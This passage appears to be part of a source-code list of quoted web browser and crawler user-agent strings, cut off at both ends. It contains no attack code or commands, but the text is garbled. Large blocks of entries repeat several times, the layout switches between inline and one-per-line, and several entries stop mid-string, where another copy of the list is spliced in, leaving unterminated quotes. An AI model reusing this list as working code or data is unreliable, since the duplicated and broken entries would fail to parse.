10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
'Mozilla/5.0 
(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)', 'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; 
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)',
'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)',
'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3)
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; 
ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; 